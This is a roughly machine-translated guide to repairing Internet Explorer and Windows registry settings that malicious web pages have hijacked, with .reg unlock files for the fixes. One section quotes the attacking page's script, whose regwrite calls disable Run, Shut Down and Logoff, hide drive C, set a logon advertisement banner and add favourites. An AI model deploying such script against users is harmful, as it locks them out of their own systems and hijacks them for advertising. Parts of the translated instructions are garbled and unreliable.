Solution to hit by a malicious website-6 to use the registry
1. Reasons for Registry Modification and Solutions
Malicious web pages are harmfulCodeActiveX web page file. The advertisement information is displayed because the browser's registry is maliciously changed.
1. The default Internet Explorer homepage is modified.
The title bar at the top of IE browser is changed to "welcome to visit ...... The registry project to be changed is:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Internet Explorer \ main \ Start page
HKEY_CURRENT_USER \ Software \ Microsoft \ Internet Explorer \ main \ Start page
Modify the key value of "start page" to modify the default homepage of IE.
① After windows is started, click "start" → "run", type Regedit in the "open" column, and press "OK;
② Expand the Registry
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Internet Explorer \ main,
In the right half window, find the string value "start page" and change the key value to "about: blank;
③ Similarly, expand the Registry
HKEY_CURRENT_USER \ Software \ Microsoft \ Internet Explorer \ main
Find the string value "start page" in the right half of the window and process it as described in section ②.
④ Exit the Registry Editor and restart the computer. Everything is OK!
Special Example: When the start page of IE is changed to some Web sites, even if you have modified it through the option settings, it will become their Web site again after restart, which is very difficult. They actually added a self-run to your machine.ProgramIt will set your IE start page as their website when the system starts.
Solution: run the registration table editor regedit.exe and expand
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ current version \ run, then delete the registry.exe sub-key, then delete the self-running program c: \ Program Files \ registry.exe, and finally reset the start page from the IE option.
2. tampered with IE's ghost page
Some IE has been changed to the start page, and even if you set "use history page", it is still invalid because the history page of the IE start page is also tampered. The following registry key is modified:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Internet Explorer \ main \ default_page_url
The key value of the subkey "default_page_url" is the homepage page of the start page.
Solution:
Remove the URLs that tamper with the website from the "default_page_ur" key.
3. Modify the default homepage of IE browser and lock the settings to prevent the user from returning the settings.
The following key values set by IE in the Registry are modified (optional when the DWORD value is 1 ):
[HKEY_CURRENT_USER \ SOFTWARE \ Policies \ Microsoft \ Internet Explorer \ Control Panel]
"Settings" = DWORD: 1
[HKEY_CURRENT_USER \ SOFTWARE \ Policies \ Microsoft \ Internet Explorer \ Control Panel]
"Links" = DWORD: 1
[HKEY_CURRENT_USER \ SOFTWARE \ Policies \ Microsoft \ Internet Explorer \ Control Panel]
"Secaddsites" = DWORD: 1
Solution: Change the preceding DWORD Value to "0" to restore the function.
4. The default homepage gray button of IE is not optional.
The HKEY_USERS \. Default \ SOFTWARE \ Policies \ Microsoft \ Internet Explorer \ Control Panel's DWORD Value "Homepage" is modified. The original key value is "0" and is changed to "1" (that is, gray is not optional ).
Solution: change the "Homepage" key to "0.
5. the IE title bar is modified.
By default, the application itself provides information about the title bar. However, you can add information to the registry project, some malicious websites use this to succeed: they change the key value under the string value window title to their website name or more advertisement information, to change the title bar of the Browser IE.
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Internet Explorer \ main \ window title
HKEY_CURRENT_USER \ Software \ Microsoft \ Internet Explorer \ main \ window title
Solution:
① After windows is started, click the "Start" → "run" menu item, type Regedit in the "open" column, and press the "OK" key;
② Expand the Registry
In HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Internet Explorer \ main, find the string value "window title" in the right pane and delete the string value, or change the key value of window title to "IE browser" and your favorite name;
③ Similarly, expand the Registry
HKEY_CURRENT_USER \ Software \ Microsoft \ Internet Explorer \ main, which is handled according to the method described in ②.
④ Exit the Registry Editor, restart the computer, and run IE.
6. the IE shortcut menu is modified.
The registry project to be modified is:
HKEY_CURRENT_USER \ Software \ Microsoft \ Internet Explorer \ menuext: the advertisement information of a new webpage is displayed in the IE right-click menu!
Solution: Open the register editor and find
HKEY_CURRENT_USER \ Software \ Microsoft \ Internet Explorer \ menuext: Delete the relevant ad provisions. Be sure not to delete the Download Software flashget and NetAnts, which are normal.
7. ie default search engine modified
There is a search engine tool button in the toolbar of IE browser to implement network search. After being tampered with, you only need to click the search tool button to link to the tampered website. The reason for this is that the following registry is modified:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Internet Explorer \ Search \ customizesearch
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Internet Explorer \ Search \ searchassistant
Solution:
Run the Registry Editor, expand the sub-keys, and change the key values of "customizesearch" and "searchassistant" to the URL of a search engine.
8. A dialog box is displayed when the system is started.
The modified registry project is:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Winlogon is built with the strings "legalnoticecaption" and "legalnoticetext". "legalnoticecaption" is the title of the prompt box, "legalnoticetext" is the text content of the prompt box. They exist. Each time we log on to the windwos desktop, a prompt window is displayed to display the advertisement information of those webpages.
Solution: Open Registry Editor and find
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Winlogon primary key. Find the "legalnoticecaption" and "legalnoticetext" strings in the right window and delete them.
9. browsing the Web page registry is disabled
This is because the Registry
Because the DWORD Value "disableregistrytools" in HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ System is changed to "1", you can restore the key value to "0.
Solution: Use the Notepad program to create a file suffixed with Reg, and copy the following content in it:
[HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ System]
"Disableregistrytools" = DWORD: 00000000
10. the Start menu of the browser page is modified.
1) Disable "Shut down the system" 2) Disable "run"
3) Disable "logout" 4) Hide drive C-your drive C cannot be found!
5) forbidden to use Registry Editor Regedit 6) forbidden to use dos program
7) Make the system unable to enter "real mode" 8) prohibit any program from running
Note: The following are the methods used to modify the victim's registry key on the webpage.
SHL. regwrite ("hkcu \ Software \ Microsoft \ Windows \ CurrentVersion
\ Policies \ Explorer \ norun ", 01," REG_BINARY ");
Note: The victim system does not have a "run" item, so that the user cannot modify the harmful webpage to the system registry through the Registry Editor.
SHL. regwrite ("hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ noclose", 01, "REG_BINARY ");
Note: make the victim system unavailable.
SHL. regwrite ("hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ nologoff", 01, "REG_BINARY ");
Note: The victim system does not have a "deregister" item
SHL. regwrite ("hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ nodrives", "00000004", "REG_DWORD ");
Note: make the victim system have no logical drive C
SHL. regwrite ("hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ winoldapp \ disabled", "REG_BINARY ");
Note: Do not run all DoS applications;
SHL. regwrite ("hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ winoldapp \ norealmode", "REG_BINARY ");
Note: The system cannot be started in "real mode" (traditional DOS mode;
Note: When you log on to the web page, it also modifies the following registry key so that a logon window is displayed during Windows logon (before Microsoft network user logon)
SHL. regwrite ("HKLM \ Software \ Microsoft \ Windows \ CurrentVersion \ Winlogon \ legalnoticecaption", "...");
Note: These codes will make the window title "Oh la ..."
SHL. regwrite ("HKLM \ Software \ Microsoft \ Windows \ CurrentVersion \ Winlogon \ legalnoticetext", "..."
Note: The above line shows the text in the window.
Note: The following two lines of code modify the registry so that all the IE Windows of the victim are added with the following title: "Oh la ..."
SHL. regwrite ("HKLM \ Software \ Microsoft \ Internet Explorer \ main \ window title", "...");
SHL. regwrite ("hkcu \ Software \ Microsoft \ Internet Explorer \ main \ window title", "...");
Note: All modifications to the victim's Registry have been completed until the above line is reached!
Note: The following code is used to add a webpage to the victim's favorites.
VaR WF, Shor, Loc;
WF = FSO. getspecialfolder (0 );
Loc = WF + "\ favorites ";
If (! FSO. folderexists (LOC ))
{
Loc = FSO. getdrivename (WF) + "\ Documents and Settings \" + net. username + "\ favorites ";
If (! FSO. folderexists (LOC ))
{
Return;
}
}
Note: The following is the code used to add a webpage to your favorites.
Addfavlnk (LOC, "Find feeling www.findfeel.com", "http://www.findfeel.com ")
Solution for victim users:
1: For Win9x users, it is recommended to press F8 when the computer is started, select to MS-DOS mode, use scanreg/restore command to restore the previous backup, normal registry.
2: For Win2000 users, copy the following content and save it as unlock. reg file, optional security mode with command line, use the command Regedit unlock. reg import, how to restart the machine is OK.
The content of the unlock. reg file is as follows:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ currentversionpolicies \ Explorer]
"NoDriveTypeAutoRun" = DWORD: 00000095
"Norun" = HEX:
"Nologoff" = HEX:
"Nodrives" = DWORD: 00000000
"Restrictrun" = DWORD: 00000000
[HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ currentversionpolicies \ System]
"Disableregistrytools" = DWORD: 00000000
[HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ currentversionpolicies \ System]
"Disableregistrytools" = DWORD: 00000000
[HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ currentversionpolicies \ winoldapp]
"Disabled" = DWORD: 00000000
[HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ currentversionpolicies \ winoldapp]
"Norealmode" = DWORD: 00000000
[HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ currentversionwinlogon]
"Legalnoticecaption" = ""
"Legalnoticetext" = ""
[HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Internet Explorer \ main]
"Window title" = "IE browser"
[HKEY_CURRENT_USER \ Software \ Microsoft \ Internet Explorer \ main]
"Window title" = "IE browser"
11. The shortcut menu in IE is invalid.
After browsing the Web page, the right-click in IE becomes invalid. Right-click does not respond!
12. Viewing the "source file" menu is disabled
In the IE window, click "View" → "Source File". The "source file" menu is disabled. The specific location is: Create a subkey "restrictions" under the registry
HKEY_CURRENT_USER \ SOFTWARE \ Policies \ Microsoft \ Internet Explorer, and then create two DWORD values under "restrictions: "noviewsource" and "nobrowsercontextmenu", and assign the two DWORD values to "1 ".
in the registry
HKEY_USERS \. under default \ SOFTWARE \ Policies \ Microsoft \ Internet Explorer \ restrictions, change the key values of "noviewsource" and "nobrowsercontextmenu" to "1 ".
solution:
Save the following content as a registry file with the suffix Reg, for example, unlock. Reg. Double-click unlock. reg to import the registry and run ie again.
[HKEY_CURRENT_USER \ SOFTWARE \ Policies \ Microsoft \ Internet Explorer \ restrictions]
"noviewsource" = DWORD: 00000000
"nobrowsercontextmenu" = DWORD: 00000000
[HKEY_USERS \. default \ SOFTWARE \ Policies \ Microsoft \ Internet Explorer \ restrictions]
"noviewsource" = DWORD: 00000000
"nobrowsercontextmenu" = DWORD: 00000000
note that the Registry file is unlocked. in Reg, "regedit4" must be capitalized, and it must be followed by a blank line, and "4" in "regedit4" There must be no space between "and" T "; otherwise, the success will be abandoned! Note: For Win2000 or WINXP users, change "regedit4" to Windows Registry Editor Version 5.00.
(Source: Hotspot Network)